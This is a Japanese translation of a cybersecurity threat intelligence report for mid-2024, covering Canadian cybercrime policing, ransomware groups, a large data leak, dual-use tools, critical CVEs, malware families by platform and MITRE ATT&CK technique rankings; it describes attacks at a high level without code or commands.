国家サイバー犯罪調整センター(NC3)は、カナダの2018年国家サイバーセキュリティ戦略を受けて2020年に設立された。カナダ王立騎馬警察(Royal Canadian Mounted Police)の管理の下、この国家警察サービスは、カナダにおけるサイバー犯罪による脅威、影響、被害の軽減を支援することを義務付けられている。NC3は、カナダの全警察機関に専門的なサポートを提供し、多様なスキルを持つ警察官と民間人のスタッフを雇用して、高度な犯罪を効果的に分析するために必要な捜査と技術的専門知識を提供している。NC3は、以下のような法執行パートナーを支援する専門サービスを提供している:
- サイバー犯罪情報
- 技術的アドバイスとガイダンス
- ツール開発
- 行動分析
- 暗号通貨のトレース
NC3は、国内外の法執行機関、政府パートナー、民間企業、学界と緊密に協力し、サイバー犯罪に対するカナダの法執行機関の対応を継続的に改善している。
ランサムウェアの蔓延
カナダにおけるランサムウェアの脅威トップ
NC3は、カナダにおけるランサムウェアの脅威の上位を特定するために定期的な評価を行っている。最新の評価では、2024年1月1日から2024年4月30日までのインシデントを対象としています。下図は、この期間におけるランサムウェアの脅威トップ10を示しています。
ランサムウェアが蔓延しているにもかかわらず、ほとんどのサイバー犯罪は報告されていない。カナダの法執行機関に報告されるサイバー犯罪は、わずか10%程度と推定されている。この報告不足により、この国におけるサイバー犯罪の蔓延と影響を完全に理解することは困難である。
報道されない犯罪
サイバーストーリーハイライトランサムウェアが空を飛ぶ
Akiraランサムウェア、LATAM航空業界を標的に
2024年6月、BlackBerry の研究者は、ラテンアメリカの航空会社に対するAkiraランサムウェアを使用したStorm-1567による攻撃を調査しました。二重の恐喝戦術で知られるこの財政的な暴力団は、最初にSSH経由でネットワークにアクセスし、Akiraを展開する前に重要なデータを流出させました。時代遅れのシステムを悪用し、正規のソフトウェアを悪用することで有名なStorm-1567は、世界中の中小企業を標的としており、2024年1月の時点で250以上の組織をターゲットにし、4200万ドル以上の身代金を集めています。
インシデントレスポンスの分析とコメント
BlackBerry インシデントレスポンス(IR)チームは、最初の感染経路がインターネットに接続されたデバイスであるインシデントを定期的に監視している。設定ミスのデバイスや工場出荷時のパスワードが設定されているデバイスなど、脆弱なデバイスに対するサイバー攻撃はよくあることです。過重労働にあえぐ企業のセキュリティ・チームは、すべてのインターネット・デバイス(ネットワーク・プリンターやノート型ウェブ・カメラなど)のセキュリティを十分に確保できていないことが多い。さらに、ネットワーク・アプライアンスやファイアウォール・アプライアンスなど、ますます重要な機能がデバイスに組み込まれるようになっている。
今四半期、IR チームは Cisco Adaptive Security Appliance (ASA) の古いバージョンと Palo Alto Networks PAN-OS ソフトウェアを搭載したデバイスに脆弱性を発見しました。保護されていない、あるいは設定が不十分なインターネット・デバイスは、サイバー窃盗犯がランサムウェアを企業環境に展開し、データを流出させる可能性があります。このことから、企業はインターネットに露出したすべてのシステムにセキュリティ・アップデートを適用し、タイムリーに実施する必要があることが浮き彫りになりました。(MITRE - 外部リモートサービス)
同チームは、不正アクセス者が会社のクラウドリソースにアクセスするインシデントを複数確認した。以下に詳述する最近の2つの状況は、定期的なシステム・アップデートと強固なネットワーク・セキュリティ対策の重要性を浮き彫りにしている。
- インシデント1:サイバーセキュリティ侵害の際、脅威者は古いCisco ASAの一連の脆弱性を悪用し、会社の仮想プライベートネットワーク(VPN)に不正アクセスした。ネットワーク内に侵入すると、Microsoft Remote Desktop Protocol(RDP)を利用してドメイン・コントローラに侵入し、ドメイン内のユーザーとグループの包括的なリストを取得しました。netscanやAdvanced IP Scannerソフトウェアなどのツールを活用し、徹底的なネットワーク・スキャンを行い、インフラストラクチャをマッピングしました。その後、攻撃者は、重要なユーザーデータを含む「C:˶Users」フォルダをすべて流出させた後、Akiraランサムウェアを展開し、重大な混乱とデータ損失を引き起こしました。
- インシデント2:あるクライアントが、ドメイン・コントローラから不正アクセスを知らせるセキュリティ・アラートを受信した。調査の結果、脅威者は旧式の使用済みCisco ASAアプライアンスの脆弱性を悪用してネットワークに侵入していたことが判明しました。侵入後、攻撃者はBlackSuitランサムウェアを展開し、顧客の業務に大きな混乱をもたらしました。
これらのインシデントは、企業がすべてのシステムに強力な認証セキュリティ管理を導入する必要性を浮き彫りにしている。(MITRE - 有効なアカウント:クラウド・アカウント)
サイバーストーリーハイライト大規模データ漏えいにより29億件の記録が流出
米国、英国、カナダの市民から4テラバイトの極めて個人的なデータが盗まれた。
4月、悪名高いアンダーグラウンドのサイバー犯罪サイト『BreachForums』に、"米国、カリフォルニア州、英国の全人口 "の個人記録が流出した疑いがあるというスレッドが投稿された。この投稿では、4テラバイトのデータが盗まれたと主張し、アメリカ市民やイギリス、カナダの人々のフルネーム、住所、電話番号、さらには社会保障番号(SSN)のような非常に機密性の高いPIIで構成されていた。
USDoDとして知られる脅威行為者は、29億行以上のレコードを盗んだと主張し、この大規模なデータセットの流出情報に対して350万米ドルという多額の料金を要求した。
この身代金要求は最終的に失敗に終わり、7月に4テラバイトのデータがBreachForumsを通じて無料で公開された。その内容は、1億3700万件以上の電子メールアドレス、2億7200万件のSSNなどであった。流出の原因は、データ・ブローカーおよび身元調査サービスNational Public Data(NPD)の子会社サイトであるRecordsCheck.netに関連すると考えられている。RecordsCheck.netは、バックエンド・データベースのパスワードを、ホームページから自由に利用できる平文ファイルで不注意にも公開していた。
NPDは正式な声明で、2023年後半に記録にアクセスしようとした試みがあったことを認めたが、影響を受けた可能性のある記録の範囲については言及しなかった。
リークされたのは最近だが、データ自体は数十年にわたるもので、このリークの影響を受けた被害者の何割かはすでに亡くなっている可能性があり、リークされたデータの一部は古い可能性が高い。また、1人の人物が多くの異なる記録を持つ可能性があり、それぞれがその人物に関連する過去の住所や名前に関連していることにも注意が必要だ。つまり、このリークによって影響を受けた人の数は、30億人が影響を受けた可能性があるという以前の誤ったメディアの主張よりもはるかに少ない可能性が高い。
しかし、PIIデータの膨大な量を考えると、米国で記録された過去最大級のデータ流出であり、米国を拠点とするすべての被害者が懸念すべきことである。この盗まれたデータは、この大失敗の影響が落ち着くまでの数ヶ月の間に、他の多くの脅威行為者によって活用され、武器化される可能性が高い。したがって、すべての国民が自分の信用情報に不正行為がないか積極的に監視し、発見された場合は信用情報機関に報告することが重要である。
-
脅威のアクターとツール
当社の内部調査や調査結果で指摘された脅威行為者以外にも、今期はいくつかのグループがさまざまなサイバー攻撃を仕掛けている。これらのグループは、多くの場合、不正な活動を実行するためにさまざまなツールやマルウェアを使用しています。ここでは、今四半期に当社の脅威リサーチ・インテリジェンスチームが確認した、最も影響力のある攻撃者と注目すべきツールを紹介します。
-
ブラックスーツ
BlackSuitは、2023年4月に表面化した民間のランサムウェア作戦である。このグループは、被害者データの流出と暗号化の両方を含む、多面的な恐喝戦略を採用しています。また、コンプライアンスを遵守しない被害者から盗んだ機密データを公開するダークウェブのデータ漏洩サイトも運営しています。BlackSuitは、医療、教育、情報技術(IT)、政府、小売、製造など、さまざまな業界のあらゆる規模の組織を標的としています。
BlackSuitの攻撃手法には、フィッシングメール、悪意のあるトレントファイル、VPNやファイアウォールの脆弱性の悪用などがあります。このグループは、Cobalt Strike、WinRAR、PuTTY、Rclone、Advanced IP Scanner、Mimikatz、PsExec、Rubeus、GMERなどの正規ツールと悪意のあるツールを組み合わせて、横の動きやクレデンシャルのダンプに活用しています。ランサムウェアのペイロードは、Windows®とLinux®の両方のオペレーティング・システム、場合によってはVMware ESXiサーバーをターゲットに設計されています。
米国保健福祉省は、BlackSuitとRoyalランサムウェアの類似性を強調し、BlackSuitがRoyalの作成者である悪名高いContiグループに由来する可能性を示唆している。BlackSuitが使用する暗号化メカニズムやコマンドラインパラメータは、Royalに見られるものと酷似しており、コードベースが共有されていることを示しています。
今期の目標は以下の通り:
- 日本のメディア・コングロマリットである株式会社KADOKAWAは、同グループがQihoo 360アンチウイルス・ソフトウェアの正規コンポーネントを装っていた。
- その他にも、アイオワ州シーダーフォールズ町、アメリカの多国籍ソフトウェア会社、カンザス市カンザス警察、世界的製薬会社オクタファーマ・プラズマ社などが標的とされている。
-
ブラックバスタ
BlackBasta(別名Black Basta)はランサムウェアの運営者であり、2022年初頭に表面化したRansomware-as-a-Service(RaaS)犯罪企業である。CISAとFBIの共同報告書によると、BlackBastaの関連会社は、北米、ヨーロッパ、オーストラリアで、医療機関を含む500以上の民間企業や重要なインフラ事業体を標的にしています。
BlackBastaは、フィッシングや既知の脆弱性の悪用など、典型的な初期アクセス方法を採用しています。アクセス権を獲得した後、敵対者はターゲット・ネットワークをマッピングするための偵察を行い、Mimikatzを使用して認証情報をダンプします。取得した認証情報を使用して、ランサムウェアのオペレーターは特権をエスカレートさせ、ネットワークを侵害するために横方向に移動します。暗号化の前に、BlackBastaの脅威行為者は防御を無効化し、機密情報を流出させ、シャドウボリュームコピーを削除して、最終的な攻撃まで姿を隠します。このグループは、重要なデータや重要なサーバーを暗号化し、機密情報を公開リークサイトで公開すると脅すという、二重の恐喝戦術を用いることで知られています。
今報告期間の目標は以下の通り:
- 米国の著名な医療機関。BlackBastaは同医療機関の患者データと業務システムを暗号化し、患者ケアとデータプライバシーを侵害しました。
- 米国のメーカー、キートロニック社。BlackBastaに起因するサイバー攻撃により、同社は業務に支障をきたし、必要不可欠なビジネス・アプリケーションへのアクセスが制限された。さらに、ランサムウェアによって盗まれたデータが流出し、同社はデータ漏洩の被害に遭いました。
これらの攻撃は、BlackBastaが様々なセクターの高価値のターゲットに焦点を当て続け、混乱と恐喝の可能性を最大化するために洗練されたランサムウェアの戦術を採用していることを浮き彫りにしている。
-
ロックビット
ロシアとの関係が疑われるサイバー犯罪グループLockBitは、その名を冠したマルウェアを通じてRaaSプロバイダーとして特化している。同グループのオペレーターは、ランサムウェアを熱心に維持・強化し、交渉を監督し、侵害が成功するとその展開を指揮する。LockBitは二重の恐喝戦略を採用しており、被害者のアクセスを制限するためにローカルデータを暗号化するだけでなく、機密情報を流出させ、身代金を支払わない限りデータが公開されると脅している。
国際的なサイバー犯罪対策部隊であるオペレーション・クロノスは、2月にロックビットを大きく妨害した。しかし、このグループは依然として非常に活発で、今四半期はEMEAの組織を最も積極的に標的としていました。標的は以下の通り:
- 局地的な重要インフラEMEAでは、ロックビットは主にイギリス、ドイツ、フランスのSMBをターゲットにしている。同グループは主に、教育、医療、公共部門に関連する小規模な重要インフラをターゲットとしています。
- フランスのHôpital de Cannes - Simone Veil。LockBit攻撃は深刻な業務妨害につながり、病院はすべてのコンピュータをオフラインにし、緊急ではない処置や予約のスケジュールを変更せざるを得なくなりました。
- 人口40万人のカンザス州最大の都市ウィチタ。この重大なランサムウェア攻撃により、同市はコンピュータ・システムのオフライン化を余儀なくされ、広範囲に混乱が広がった。ロックビットは身代金の期限をウェブサイトに公開し、要求に応じるよう市の行政への圧力を強めた。
-
シャイニーハンターズ
ShinyHuntersは2020年に初めて出現した脅威グループで、複数の業界にわたるデータ侵害で知られている。彼らの攻撃には、インドネシアのeコマース企業Tokopediaや、GitHub、Pizza Hut Australiaに対するものが含まれると報告されている。ShinyHuntersは、盗んだデータをフォーラムで売りに出し、時には無料で流出させることもある。皮肉なことに、このグループはGitHubのリポジトリにあるコードから脆弱性を見つけることが多い。安全でないクラウドバケットを探し回り、盗んだ認証情報を悪用し、フィッシング攻撃を利用して侵入を容易にする。
この報告期間におけるその他の疑惑の対象は以下の通り:
- バンコ・サンタンデールS.A.は、ラテンアメリカ、米国、英国、スペインの顧客にサービスを提供するスペインの銀行である。ShinyHuntersは、この情報漏えいのデータを約200万ドルで売りに出し、3000万人の顧客と従業員に影響を与えました。
- 多国籍エンターテイメントチケット販売流通企業。同社の顧客は、同社が利用するAIデータクラウド「Snowflake」のアカウントを経由してデータを盗まれた。このアカウントには多要素認証がなかったため、脅威グループによるアクセスが可能となった。ShinyHuntersはこのデータを50万米ドルで売ると申し出た。
-
アキラ
Akiraランサムウェアは2023年3月に初めて観測され、様々な分野にまたがる広範囲な攻撃により瞬く間に有名になりました。このグループの活動は、注目を集めた一連の攻撃と、ランサムウェアの状況における永続的な存在感によって特徴づけられている。Akiraは特に、データを暗号化するだけでなく、身代金を支払わなければ盗んだデータを流出させると脅す、二重の恐喝戦術を用いることで知られている。この手法は、被害者に要求を飲ませるのに効果的であることが証明されている。
Akiraは、当初Windowsシステムに焦点を当てていたが、その後Linuxの亜種を含むように活動を拡大している。このグループは、フィッシング・キャンペーンや既知の脆弱性の悪用など、一般的な初期アクセス手法を採用しています。Akiraはまた、クレデンシャルアクセスにはMimikatzやLaZagne、リモート実行にはPsExec、リモートアクセスにはAnyDeskやRadminといった一般に入手可能なツールを利用しています。
AkiraはRaaSとして動作し、当初はC++で開発され、暗号化されたファイルには.akira拡張子を使用する。.powerrangesという拡張子を使用するRustベースの亜種も確認されている。Akiraの最近の活動は、ヘルスケア、金融サービス、製造、テクノロジー分野を標的としています。これらの攻撃は、同グループの適応能力の高さと、幅広い業界に対する継続的な脅威を浮き彫りにしています。
-
ツール
Rclone、Rubeus、GMER、WinSCP、Cobalt Strikeのようなツールは、データ管理、侵入テスト、システム保守に欠かせない。また、その柔軟性とアクセシビリティにより、脅威行為者に悪用されやすい便利なツールでもある。
-
Rクローン
Rcloneは、ローカルマシンとリモートストレージ間のデータの同期、コピー、移動、ミラーリングを容易にするコマンドラインプログラムです。Rcloneは、HTTP、FTP、SMB、Google Drive、MEGA、Dropboxなど、複数のオープンソースおよびプロプライエタリなサービスやプラットフォームをサポートするバックエンドを提供します。この柔軟性により、Rcloneは合法的なユーザーにとって実用的ですが、クラウドサービスにデータを流出させる手段を探している脅威行為者にとっても理想的です。Rcloneは、Akira、BlackBasta、LockBitといった今四半期に活動したものも含め、長年にわたり多くのランサムウェア・アクターによって使用されてきました。 -
ルベウス
Rubeusは、Benjamin Delpyの有名なKekeoプロジェクトから転用されたオープンソースのツールで、チケットの取得と更新、制約付き委任の悪用、チケットの偽造、管理、流出、ハーベスティング、ケルベロースティングなど、生のKerberosのやり取りと悪用に使用されます。現在では、悪意のある行為者によって、より大規模な攻撃フレームワークの一部として頻繁に使用され、クロスプラットフォーム・インプラントや複数の通信プロトコルをサポートするSliver C2のようなツールと統合されています。 -
GMER
GMERは、隠されたプロセス、スレッド、モジュール、サービス、ファイル、レジストリキーをスキャンすることで、ルートキットを検出・削除するように設計されたアプリケーションです。また、割り込みディスクリプタ・テーブル(IDT)、システム・サービス・ディスクリプタ・テーブル(SSDT)、入出力要求パケット(IRP)コールにインライン・フックおよびフックを実行します。GMERは通常、有害なカーネル・ドライバの検出と削除に使われる良性のツールだが、セキュリティ対策をバイパスするために悪用されることもある。例えば、PlayとBlackSuitの両ランサムウェア・グループは、GMERを使用してセキュリティ防御を無力化し、ペイロードの実行を妨害することなく確実にしました。 -
ウィンエスシーピー
Windows Secure Copy (WinSCP) は、Microsoft Windows 用に設計された SFTP、FTP、WebDAV、および SCP プロトコルのための無料のオープンソースクライアントです。SFTPのような暗号化されたプロトコルを活用してデータの安全性を確保し、ローカルとリモートのコンピュータ間で安全なファイル転送を容易にします。しかし、その機能は、脅威行為者が選択するツールにもなっている。攻撃者はWinSCPを使用して、大量のデータをこっそりと流出させたり、マルウェアをターゲットサーバーにアップロードしてシステムをさらに侵害したり、リモートアクセスして任意のコマンドを実行したり、悪意のあるソフトウェアを追加導入したりして、侵害されたシステムを持続的に制御することができます。 -
コバルト・ストライク
Cobalt Strikeは、ネットワーク環境内の脅威アクターの永続的な存在を再現するために綿密に設計された、洗練された敵対シミュレーションフレームワークとして機能します。Cobalt Strikeは、エージェント(Beacon)とサーバー(Team Server)という2つの重要なコンポーネントを中心に構成され、シームレスな相互作用を組織する。Cobalt Strikeチームサーバーは、インターネット上でホストされる長期的なC2サーバーとして機能し、被害者マシン上に配置されたBeaconペイロードとの常時通信を維持します。
Cobalt Strikeは、主に侵入テスト担当者やレッドチーマーがネットワークのセキュリティ態勢を評価するためのツールとして利用されているが、残念ながら悪意のある脅威行為者にも悪用されている。意図された目的とは裏腹に、そのコードがオンライン上に流出する事例が発生し、多様な敵対者による迅速な武器化につながっています。この二重の性質は、その悪用に関連するリスクを軽減し、潜在的な悪用からネットワークを保護するための警戒と強固なサイバーセキュリティ対策の重要性を浮き彫りにしている。
サイバーストーリーハイライト新興ランサムウェアグループ - スペースベア
ランサムウェアのギャングが飽和状態にあるサイバー脅威の状況において、合法的な組織を標的にすることは、サイバー犯罪者にとって依然として有利です。新しいグループが出現したり、古いギャングからスピンオフしたりすることは頻繁にあり、多くの場合、新しい、または改良されたランサムウェアの系統や、過去の脅威行為者から試行錯誤され、テストされた手法を踏襲する手口で活動を開始します。
この報告期間に現れたそのようなグループのひとつが、巧妙で洗練されたリークサイトで知られるスペース・ベアーズである。研究者の中には、彼らがフォボスRaaSの運営者とつながりがあるのではないかと指摘する者もいる。
スペースベアとは?
今日のほとんどのランサムウェアギャングと同様、Space Bearsは二重の恐喝方法を採用しています。被害者のネットワークに侵入すると、まず機密データを流出させ、次に暗号化し、被害者に身代金の支払いを迫ります。身代金を支払わなければ、インターネット上にデータを公開すると脅すこともあります。
盗まれたデータへの言及は、ディープウェブの「.onion」アドレスにあるリークサイトに掲載されている。Torプロジェクトは通称「オニオン・ルーター」と呼ばれ、ユーザーのオンライン活動を匿名かつ安全に保つオープンソースのプライバシー・ツールである。被害者はこの流出サイトで名指しされ、恥をかかされる。指定された制限時間内に身代金を支払わない場合、データ公開までのカウントダウン・タイマーが表示される。4月中旬に活動を開始して以来、このグループはすでに世界のさまざまな業界で20人以上の被害者を標的にしている。
スペース・ベアーのターゲット産業とジオロケーション
一般的な脆弱性と暴露
CVEs(Common Vulnerabilities and Exposures)は、既知のセキュリティ脆弱性と暴露を特定し、標準化し、公表するための枠組みです。4月から2024年6月までに、ほぼ12,011件の新しいCVEが米国国立標準技術研究所(NIST)によって報告された。これは、2024年1月から3月までの同様の期間に比べ、開示された脆弱性が35%近く増加したことになる。
5月に新たに発見されたCVEは5,103件に達し、今年第1四半期に記録された数字をすべて更新した。これらには以下が含まれる:
パロアルト PAN-OS RCE
CVE-2024-3400(10.0 Critical) 任意のコード実行
パロアルト社によると、この問題は、GlobalProtect ゲートウェイまたは GlobalProtect ポータルで構成された PAN-OS 10.2、PAN-OS 11.0、および PAN-OS 11.1 ファイアウォールに該当します。この CVE は、Palo Alto Networks PAN-OS ソフトウェアの GlobalProtect 機能における任意のファイル作成の脆弱性に起因するコマンドインジェクションに関するものです。この脆弱性により、認証されていない攻撃者がファイアウォールの root 権限で任意のコードを実行できる可能性があります。この可能性を考慮し、CVE には最高のクリティカルスコアが与えられました。
PyTorchフレームワークにRCEの脆弱性
CVE-2024-5480(10.0 Critical) 任意コード実行
PyTorch の 'torch.distributed.rpc' フレームワーク、特に 2.2.2 より前のバージョンに脆弱性があり、 リモートでコードを実行 (RCE) される可能性があります。この脆弱性により、攻撃者は組み込みの Python 関数を利用して任意のコマンドを実行することができます。
量子ゲートウェイ情報公開
CVE-2024-24919(8.6 High) 認証バイパス
VPN のような境界ネットワーク・デバイスは、ハッカーや先進国のスポンサーにとって格好の標的です。Check Point™ は、2024年5月28日にゼロデイ・アドバイザリを公開し、同社のセキュリティ・ゲートウェイに存在する脆弱性によって、攻撃者が機密情報にアクセスしたり、ドメイン権限を取得したりする可能性があることを警告しています。この脆弱性により、ハッカーは横方向に移動し、さらなるネットワーク特権を獲得することが可能になります。チェック・ポイントは声明の中で、この欠陥の影響を受ける可能性のあるデバイスは数千台に上り、 不正アクセスが多数試みられていると指摘しています。
プラットフォーム別の脅威Windows
インフォシーラー
Lumma Stealerは、暗号通貨ウォレットのデータや2要素認証(2FA)ブラウザ拡張機能のデータなど、被害者のデバイスからプライベートかつセンシティブなデータを抜き取ることに特化したCベースの情報窃取ツールです。
ダウンローダー
GuLoader(別名CloudEyE)は、Visual Basic 5または6でラッピングされた暗号化されたシェルコードで、さまざまなタイプの追加ペイロードをダウンロードします。
インフォシーラー
Agent Teslaは.NETベースのトロイの木馬で、MaaSとして販売されることが多く、主にクレデンシャル・ハーベスティングに使用される。
インフォシーラー
RiseProは、被害者のデバイスにアクセスし、機密データを収集してC2サーバーに送り返すために、多くの配布方法を使用する。
インフォシーラー
RedLine Stealerは、幅広いアプリケーションやサービスを使用して、パスワード、クッキー、クレジットカード情報などの被害者情報を収集します。
リモートアクセス型トロイの木馬
Remcosは、リモートコントロールと監視の略で、被害者のデバイスにリモートアクセスするために使用されるアプリケーションです。
リモートアクセス型トロイの木馬
DCRatは、被害者の情報を盗み出し、C2サーバーからコマンドを実行するリモートアクセス型トロイの木馬です。DCRatはSignal経由で配布されていることが確認されています。
ボットネット
アマデイは、被害者の情報を収集し、C2サーバーからのコマンドを待って追加のペイロードをダウンロードするボットネットである。
プラットフォーム別の脅威Linux
トロイの木馬
トロイの木馬 XorDDos は、今報告期間中、遠隔測定においてその流行を維持しています。XorDDos は、通信および実行データへのアクセスを制御するために XOR 暗号化を使用して、Linux ベースのデバイスに感染し、C2 命令を介して単一のボットネットとしてそれらを制御します。
バックドア
BPFDoorは、Berkeley Packet Filter (BPF)スニッファを利用してネットワーク・トラフィックを傍受し、変更するLinuxバックドアです。BPFDoorはファイアウォールを迂回し、検知されずに残ることができるため、脅威行為者グループRed Menshenによって受動的な監視ツールとして使用されてきました。BPFDoorの新しい亜種はリバースシェル通信を採用し、暗号化を強化しています。
ボットネット
Miraiは、認証バイパスの欠陥を利用してエンドポイントにアクセスし、コマンドインジェクションの脆弱性を利用してボットネットを配信・展開し、脆弱なデバイスを乗っ取ることが検出されている。
ボットネット
Gafgytとしても知られるBashliteもLinuxボットネットで、C2サーバーを使って感染したデバイスに実行させる指示を送る。このボットネットは、ルーターなどのモノのインターネット(IoT)デバイスを標的にしており、標的に対する大規模なDDoS攻撃を調整するために使用していることが記録されている。
コインマイナー
XMRigは、その高い性能とオープンソースの性質により、Moneroなどの暗号通貨をマイニングするためのツールとして人気があります。XMRigは、システムに対する最初のアクセスを獲得すると、脅威行為者によって展開され、被害者が知らないうちに暗号を採掘するために使用されることがよくあります。
プラットフォーム別にみた一般的な脅威:macOS
泥棒
4月にKandjiの脅威リサーチチームによって発見され、命名されたCuckoo Stealerは、スパイウェアと情報窃取機能を含む悪意のあるディスクイメージ(DMG)ファイルとして配布されます。Cuckoo Stealerが発見されて以来、このマルウェアの新しいサンプルが急激に増加しています。
泥棒
Atomic Stealer(別名AMOS)は依然として流行しており、新たな亜種が多数発見されている。新たな亜種は、ディスクイメージ経由で配布される様々なアプリを装っている。AMOSは、パスワード、ブラウザクッキー、オートフィルデータ、暗号ウォレット、Macキーチェーンデータを狙う窃盗犯です。
バックドア
Python Package Index(PyPI)を利用した悪意のある攻撃が研究者によって発見された。このマルウェアは、PyPIライブラリを利用してターゲットマシンにSliver C2ペイロードをインストールします。このパッケージはGoプログラミング言語で書かれており、攻撃を実行するためにPortable Networks Graphic(PNG)ファイル内のステガノグラフィーを使用しています。
泥棒
このマルウェアは、Arcウェブブラウザ用の悪質なGoogle広告を利用することで拡散します。これらの広告は被害者を騙して悪意のあるDMGインストーラーファイルをダウンロードさせ、感染プロセスを開始させ、マルウェアをマシンに落とします。Poseidonには、ユーザー認証情報、VPN設定、暗号通貨ウォレットを採取する機能があります。
プラットフォーム別の脅威アンドロイド
インフォシーラー
この情報窃取ツールは、Androidアクセシビリティサービスを利用してユーザーデータをキャプチャし、キャプチャしたデータをC2サーバーに送信します。SpyNoteには、クリック/ロングクリック、スクリーンショットの撮影、被害者の画面のロックなどの機能が含まれています。
バックドア/ランサムウェア
Rafel RATは、トロイの木馬アプリケーションとして、またはフィッシングキャンペーンを通じて配布されます。その機能には、C2、位置追跡、デバイス通知のリダイレクト、ターゲットデバイスからの個人的なSMSメッセージや通話ログの抽出などが含まれます。
インフォシーラー
SoumniBot はバンキング・キーを盗み、被害者の銀行口座を略奪します。このマルウェアは、Androidマニフェスト内の検証の問題を悪用し、リモートサーバーにアップロードする情報を盗み出します。
インフォシーラー
Vulturは、トロイの木馬アプリケーションや「smishing(SMSフィッシング)」と呼ばれるソーシャルエンジニアリングの手法を通じて配布されています。データの流出に加え、脅威者はVulturを使用してファイルシステムに変更を加え、実行権限を変更し、Android Accessibility Servicesを使用して感染したデバイスを制御することができます。
MITREの共通テクニック
脅威グループのハイレベルなテクニックを理解することは、どの検知テクニックを優先すべきかを決定する際に役立ちます。BlackBerry 、本レポート期間中に脅威アクターが使用したテクニックのトップ20は以下のとおりです。
検出されたテクニック
以下の表は、上位20のテクニックを示している。変化」欄の上向き矢印(↑)は、前回のレポートから そのテクニックの使用率が上昇 したことを示す。下向き矢印(↓)は、 前回のレポートから使用率が 減少したことを 示す。イコール(=)の記号は、そのテクニックが前回のレポートと同じ位置にあることを意味する。
| 技術名 | テクニックID | 戦術名 | 最終レポート | 変更 |
|---|---|---|---|---|
|
ハイジャック実行フロー
|
T1574
|
永続性、特権のエスカレーション、防御回避
|
NA
|
↑
|
|
DLLサイドローディング
|
T1574.002
|
永続性、特権のエスカレーション、防御回避
|
3
|
↑
|
|
プロセス・インジェクション
|
T1055
|
特権のエスカレーション、防御回避
|
1
|
↓
|
|
入力キャプチャ
|
T1056
|
クレデンシャル・アクセス、コレクション
|
4
|
=
|
|
システム情報の発見
|
T1082
|
ディスカバリー
|
2
|
↓
|
|
ソフトウェア・ディスカバリー
|
T1518
|
ディスカバリー
|
NA
|
↑
|
|
セキュリティ・ソフトウェアの発見
|
T1518.001
|
ディスカバリー
|
5
|
↓
|
|
プロセス・ディスカバリー
|
T1057
|
ディスカバリー
|
8
|
↓
|
|
ファイルとディレクトリの検出
|
T1083
|
ディスカバリー
|
7
|
↓
|
|
マスカレード
|
T1036
|
防御回避
|
6
|
↓
|
|
アプリケーション層プロトコル
|
T1071
|
コマンド&コントロール
|
9
|
↓
|
|
非アプリケーション層プロトコル
|
T1095
|
コマンド&コントロール
|
11
|
↓
|
|
リモート・システム・ディスカバリー
|
T1018
|
ディスカバリー
|
12
|
↓
|
|
ブートまたはログオンの自動開始実行
|
T1547
|
永続性、特権のエスカレーション
|
NA
|
↑
|
|
レジストリの実行キー / スタートアップフォルダ
|
T1547.001
|
永続性、特権のエスカレーション
|
10
|
↓
|
|
アプリケーション・ウィンドウの発見
|
T1010
|
ディスカバリー
|
13
|
↓
|
|
インペア・ディフェンス
|
T1562
|
防御回避
|
NA
|
↑
|
|
ツールの無効化または変更
|
T1562.001
|
防御回避
|
17
|
↓
|
|
スケジュールされたタスク/ジョブ
|
T1053
|
実行、永続性、特権の昇格
|
15
|
↓
|
|
現地システムからのデータ
|
T1005
|
コレクション
|
NA
|
↑
|
| テクニックID | |
|---|---|
| ハイジャック実行フロー |
T1574
|
| DLLサイドローディング |
T1574.002
|
| プロセス・インジェクション |
T1055
|
| 入力キャプチャ |
T1056
|
| システム情報の発見 |
T1082
|
| ソフトウェア・ディスカバリー |
T1518
|
| セキュリティ・ソフトウェアの発見 |
T1518.001
|
| プロセス・ディスカバリー |
T1057
|
| ファイルとディレクトリの検出 |
T1083
|
| マスカレード |
T1036
|
| アプリケーション層プロトコル |
T1071
|
| 非アプリケーション層プロトコル |
T1095
|
| リモート・システム・ディスカバリー |
T1018
|
| ブートまたはログオンの自動開始実行 |
T1547
|
| レジストリの実行キー / スタートアップフォルダ |
T1547.001
|
| アプリケーション・ウィンドウの発見 |
T1010
|
| インペア・ディフェンス |
T1562
|
| ツールの無効化または変更 |
T1562.001
|
| スケジュールされたタスク/ジョブ |
T1053
|
| 現地システムからのデータ |
T1005
|
| 戦術名 | |
|---|---|
| ハイジャック実行フロー |
永続性、特権のエスカレーション、防御回避
|
| DLLサイドローディング |
永続性、特権のエスカレーション、防御回避
|
| プロセス・インジェクション |
特権のエスカレーション、防御回避
|
| 入力キャプチャ |
クレデンシャル・アクセス、コレクション
|
| システム情報の発見 |
ディスカバリー
|
| ソフトウェア・ディスカバリー |
ディスカバリー
|
| セキュリティ・ソフトウェアの発見 |
ディスカバリー
|
| プロセス・ディスカバリー |
ディスカバリー
|
| ファイルとディレクトリの検出 |
ディスカバリー
|
| マスカレード |
防御回避
|
| アプリケーション層プロトコル |
コマンド&コントロール
|
| 非アプリケーション層プロトコル |
コマンド&コントロール
|
| リモート・システム・ディスカバリー |
ディスカバリー
|
| ブートまたはログオンの自動開始実行 |
永続性、特権のエスカレーション
|
| レジストリの実行キー / スタートアップフォルダ |
永続性、特権のエスカレーション
|
| アプリケーション・ウィンドウの発見 |
ディスカバリー
|
| インペア・ディフェンス |
防御回避
|
| ツールの無効化または変更 |
防御回避
|
| スケジュールされたタスク/ジョブ |
実行、永続性、特権の昇格
|
| 現地システムからのデータ |
コレクション
|
| 最終レポート | |
|---|---|
| ハイジャック実行フロー |
NA
|
| DLLサイドローディング |
3
|
| プロセス・インジェクション |
1
|
| 入力キャプチャ |
4
|
| システム情報の発見 |
2
|
| ソフトウェア・ディスカバリー |
NA
|
| セキュリティ・ソフトウェアの発見 |
5
|
| プロセス・ディスカバリー |
8
|
| ファイルとディレクトリの検出 |
7
|
| マスカレード |
6
|
| アプリケーション層プロトコル |
9
|
| 非アプリケーション層プロトコル |
11
|
| リモート・システム・ディスカバリー |
12
|
| ブートまたはログオンの自動開始実行 |
NA
|
| レジストリの実行キー / スタートアップフォルダ |
10
|
| アプリケーション・ウィンドウの発見 |
13
|
| インペア・ディフェンス |
NA
|
| ツールの無効化または変更 |
17
|
| スケジュールされたタスク/ジョブ |
15
|
| 現地システムからのデータ |
NA
|
| 変更 | |
|---|---|
| ハイジャック実行フロー |
↑
|
| DLLサイドローディング |
↑
|
| プロセス・インジェクション |
↓
|
| 入力キャプチャ |
=
|
| システム情報の発見 |
↓
|
| ソフトウェア・ディスカバリー |
↑
|
| セキュリティ・ソフトウェアの発見 |
↓
|
| プロセス・ディスカバリー |
↓
|
| ファイルとディレクトリの検出 |
↓
